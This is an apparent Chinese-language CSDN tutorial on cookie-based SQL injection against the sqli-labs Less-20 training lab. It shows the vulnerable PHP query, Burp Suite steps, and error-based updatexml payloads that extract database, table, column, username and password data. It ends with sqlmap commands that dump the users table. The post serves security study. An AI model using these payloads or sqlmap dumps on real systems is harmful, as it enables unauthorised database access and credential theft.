MySQL cookie注入

最新推荐文章于 2024-04-01 22:00:44 发布
最新推荐文章于 2024-04-01 22:00:44 发布
阅读量1.9k 收藏 3
点赞数 3
分类专栏: 渗透测试学习 信息安全 Web安全 文章标签: mysql 安全 服务器
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m_de_g/article/details/121783580
版权
本文详细解析了MySQL cookie注入漏洞的形成过程,通过实例展示了如何利用注入漏洞进行SQL操作,包括爆破数据库、数据表和字段,以及使用sqlmap工具的安全测试。重点介绍了利用'or'和'updatexml'技巧进行信息窃取。
摘要由CSDN通过智能技术生成

MySQL cookie注入

1.cookie介绍

服务器可以利用cookie包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。cookie最典型的应用是判定注册用户是否已经登录网站。

用户可能会在一段时间内在同一网站的不同页面中选择不同的商品吗,这些信息都会写cookie,以便在最后付款时提取信息。

我们按下F12,选择控制台,在命令行中输入document.cookie,回车即可得到我们本地的cookie
在这里插入图片描述

2.cookie注入代码分析

代码中使用cookie传递参数,但是没有对cookie中传递的参数进行过滤操作。导致SQL注入漏洞的产生。
在这里插入图片描述
用户传入进来的cookie,是可控的,并且还可以执行SQL语句

$sql="SELECT * FROM users WHERE username='$cookee' LIMIT 0,1";

我们可以闭合前面的单引号,然后执行我们想要执行的SQL语句

3。cookie注入利用

我们以sql-lab-less20为例
1.输入用户名和密码进行抓包
在这里插入图片描述
2.发送到repeatergo,查看response,点击Follow redirection
在这里插入图片描述
3.返回到Proxy
在这里插入图片描述

4.点击Forward进行两次放包
在这里插入图片描述
5.可以看到此时的cookieuname=admin,我们还是重复上面的操作,将数据包发送至Repeater
在这里插入图片描述
6.go一下,查看返回的数据
在这里插入图片描述
7.在用户名后面加上反斜杠,查看报错信息
在这里插入图片描述

8.利用’ or 1=1 --+输出第一个用户名和密码。
在这里插入图片描述
9.爆破数据库

' and updatexml(1,concat(0x7e,database(),0x7e),1) --+

在这里插入图片描述
10.爆破数据表

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 0,1),0x7e),1) --+

在这里插入图片描述
我们要的是users表,因此,往后依次爆破即可

' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='security' limit 3,1),0x7e),1) --+

在这里插入图片描述
12.爆破字段名

' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_schema='security' and table_name='users' limit 0,1),0x7e),1) --+

在这里插入图片描述
14.有爆字段可知,此处有三个字段,我们只需,以此爆破即可,而我们关注的是用户名和密码

获取用户名信息

' and updatexml(1,concat(0x7e,(select username from users limit 0,1),0x7e),1) --+

在这里插入图片描述
获取密码信息

' and updatexml(1,concat(0x7e,(select password from users limit 0,1),0x7e),1) --+

在这里插入图片描述

4.sqlmap安全测试

sqlmap cookie注入
1.抓取数据包,并且在cookie后面加上星号(*)
在这里插入图片描述
2.cookie注入渗透测试

python2 sqlmap.py -r "1.txt" --level 3 --batch

在这里插入图片描述
3.爆破数据库

python2 sqlmap.py -r "1.txt" --level 3 --batch --dbs

在这里插入图片描述
4.爆破数据表

python2 sqlmap.py -r "1.txt" --level 3 --batch -D security --tables

在这里插入图片描述
5.爆破字段及内容

python2 sqlmap.py -r "1.txt" --level 3 --batch -D security -T users --dump

在这里插入图片描述

山川绿水
关注
专栏目录
24-5 sql注入攻击 - cookie注入
weixin_43263566的博客
03-01 269
Cookie(HTTP Cookie)是服务器发送到用户浏览器并保存在本地的一小段数据,用于记录用户的相关信息和状态。这些信息通常包括用户的身份标识、网站偏好设置、购物车内容等。通过在浏览器中设置Cookie服务器可以在用户访问同一网站的不同页面或在不同时间点时识别用户,并提供个性化的服务。例如,网站可以使用Cookie来记住用户的登录状态,以便用户不必在每次访问时重新输入用户名和密码。
Access数据库——Cookie注入
weixin_53026460的博客
11-18 1489
SQL注入的本质是用户输入的数据会被当作代码执行;Cookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果获取了管理员的Cookie,你可以无需密码直接登录管理员账号;数据库有很多种类,常见的数据库有Access、Mysql、msSQL(sql server)、Oracle,前面我们学的联合查询和盲注那些语句都是Mysql的内容;POST注入和HEAD注入其实就是传参方式不同来分类,比如说POST注入的GET传参和POST传参 就是根据传参方式不同来分类的,POST注入不存在数据库限制
cookie注入详解(access)
weixin_45698828的博客
10-20 1419
SQL是操作数据库数据的结构化查询语言,网页的应用数据和后台数据库中的数据进行交互时会采用SQL。而SQL注入是将Web页面的原URL、表单域或数据包输入的参数,修改拼接成SQL语句,传递给Web服务器,进而传给数据库服务器以执行数据库命令。如Web应用程序的开发人员对用户所输入的数据或cookie等内容不进行过滤或验证(即存在注入点)就直接传输给数据库,就可能导致拼接的SQL被执行,获取对数据库的信息以及提权,发生SQL注入攻击。
Mysql Cookie注入
熊俊坤的博客
11-22 1202
Cookie注入原理在ASP中,Request对象获取客户端提交数据常用的两种方法是GET和POST,此外,Request对象可以直接使用Request(“name”),不通过集合来获得数据(缺点是效率低下,容易出错)。当我们省略具体的集合名称时,ASP按照QueryString(GET),Form(POST),Cookie,Severvariable集合的顺序来搜索。
MySQL Cookie Base64注入
m_de_g的博客
12-08 2542
Cookie Base64注入 1.Base64介绍 Base64编码是从二进制到字符的过程,可用于在HTTP环境下传递较长的标识信息。Base64是网络上最常见的用于8Bit字节码的编码方式之一,Base64就是一种基于64个可打印字符来表示二进制数据的方法。 将原始内容转换为二进制,从左到右一次取6位,然后在最高位补两位0,形成新的内容。 编码规则: (1)把3个字符变成4个字符。 (2)每76个字符加一个换行符。 (3)最后的结束符也要处理。 2.Cookie Base64注入代码分析 base64_
php cookie
weixin_34202952的博客
09-01 98
cookie 常用于识别用户。 1.什么是 Cookiecookie 常用于识别用户。cookie服务器留在用户计算机中的小文件。每当相同的计算机通过浏览器请求页面时,它同时会发送 cookie。通过 PHP,您能够创建并取回 cookie 的值。 2.如何创建 cookie? setcookie() 函数用于设置 cookie。 注释:setcookie(...
SQL注入cookie注入
梁顿的专栏
09-30 697
前提1、程序使用request(“xxx”)方式来获取数据。 2、涉及的知识
cookie注入
LSYZWF的博客
05-20 1958
文章目录cooike注入cooike注入原理:cooike注入形成条件:cooike注入阶段:设置cooikeSQL-lab实战(less-21)参考文档参考文档 cooike注入 cooike注入原理: 修改cooike的值,使注入的值能够在拼接数据库查询语句从而获得信息,基本上与SQL注入中的get方式提交和post表单方式提交无区别。 cooike注入形成条件: 1、程序对get和post方式提交的数据进行了过滤,但未对cookie提交的数据库进行过滤。 2、在条件1的基础上还需要程序对提交数据获取方
mysql 5.0 注入 区别_MySQL注入总结
weixin_33166692的博客
01-19 2040
0x01 MySQL 5.0以上和MySQL 5.0以下版本的区别MySQL5.0以上版本存在一个叫information_schema的数据库,它存储着数据库的所有信息,其中保存着关于MySQL服务器所维护的所有其他数据库的信息。如数据库名,数据库的表,表栏的数据类型和访问权限等。而5.0以下没有。information_schema系统数据库,记录当前数据库的数据库,表,列,用户权限信息SCH...
Access注入——Cookie注入,偏移注入
weixin_46601374的博客
02-26 1270
Cookie注入简介 什么是CookieCookie就是代表你身份的一串字符串,网站根据Cookie来识别你是谁,如果你获取了管理员的Cookie,你可以无需密码直接登陆管理员账号
SQL注入实战:Cookie注入(爆出mysql数据库名字或者版本信息)
ting_liang的博客
01-21 556
1、服务器可以利用Cookies包含信息的任意性来筛选并经常性维护这些信息,以判断在HTTP传输中的状态。Cookies典型的应用是判定注册用户是否已经登录网站,用户可能会得到提示,是否在下一次进入此网站时保留用户信息以便简化登录手续,这些都是Cookies的功能。用户可能会在一段时间内在同一家网站的不同页面中选择不同的商品,这些信息都会写Cookies,以便在最后付款时提取信息。实验到此结束,注入点是cookie,用cookie进行注入爆出数据。上面是cookie的原理,那么我们怎么进行查找注入点了。
SQL注入--利用cookie进行注入
pakho_C的博客
01-04 667
SQL注入–利用cookie进行注入 靶场:sqli-labs-master 下载链接:靶场下载链接 第20关 php源码: <?php //including the Mysql connect parameters. include("../sql-connections/sql-connect.php"); error_reporting(0); if(!isset($_COOKIE['uname'])) { //including the Mysql connect parameter
MySQL结构、Cookie注入、UA注入、Refer注入 (ctfhub)
最新发布
2401_82985722的博客
04-01 912
User-Agent是Http协议中的一部分,属于头域的组成部分,(简称UA)。是一种向访问网站提供你所使用的浏览器类型、
SQL注入cookie注入攻击
coderge's CSDN Blog.
09-19 1882
目录 1 cookie注入代码分析 2 实验过程 1 cookie注入代码分析 通过$_COOKIE能获取浏览器cookie中的数据,在cookie注 入页面中程序通过$_COOKIE获取参数ID,然后直接将ID拼接到select语句中进行查询,如果有结果,则将结果输出到页面,代码如下所示。 <?php $id = $_COOKIE['id']; $value = "1"; setcookie("id",$value); $con=mysqli_connect("local
数据库进阶之cookie 注入
qq_41220326的博客
11-16 192
数据库进阶之cookie 注入 sql 注入原理: 你构造的攻击语句 注入到 网站原本的sql查询语句中 被 网站数据库执行. 成功返回你想要的数据. 即 注入成功 sql 注入流程: 1,判断目标网站是否存在数据库注入漏洞 and 1=1 页面有内容 正常显示 and 1=2 页面没有内容 非正常显示 符合以上两点 存在 数字型sql 注入漏洞 ID=1 and 1=1 页面正常显示 有内容 id=1 and 1=2 页面正常显示 有内容 符合以上两点 存在 字符型sql 注入漏洞 2, 判断字段数
渗透测试之数据库注入——cookie注入
weixin_48803011的博客
12-13 741
cookie注入就是数据库注入的一种;cookie会记录我们的一些信息以方便我们的体验更佳。但这也给网站造成了一定的风险。
mysql 注入攻击与防御_防御SQL注入和XSS攻击
weixin_33298352的博客
02-07 506
无意苦争春 竹子熊 2017.7.28防御SQL注入sql注入是网站开发常见的安全漏洞之一,其产生的原因是开发人员未对用户输入的数据进行过滤就拼接到sql语句中执行,导致用户输入的一些特殊字符破坏可原有SQL语句的逻辑,造成数据泄漏,被篡改,删除等危险的后果.在此前的项目中,操作数据库使用MYSQLi扩展的预处理机制,将sql语句和数据分离,从本质上避免了SQL注入问题的发生.需要注意的是,如...
整理关于sql手工的注入(Access、MSSQL、MySQLcookie注入、时间注入、头注入
weixin_45945976的博客
10-18 2484
什么是SQL注入? 开发人员在开发Web系统时对输入的数据没有进行有效的验证及过滤,就存在引发SQL注入漏洞的可能并导致查看、插入、删除数据库的数据,甚至可以执行主机的系统命令。 SQL注入容易出现在哪些地方? ①URL动态传值,如:asp?id=1 ②留言板 ③搜索框 ④登录框 … 这些在使用时,要与数据库进行交互的地方。 下面介绍一下sql注入中的手工注入 常见的测试方法: 1)单引号测试:’ 2)and 1=1、and 1=2 条件测试 先解释下and 1=1 和and 1=2; and 是SQL
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值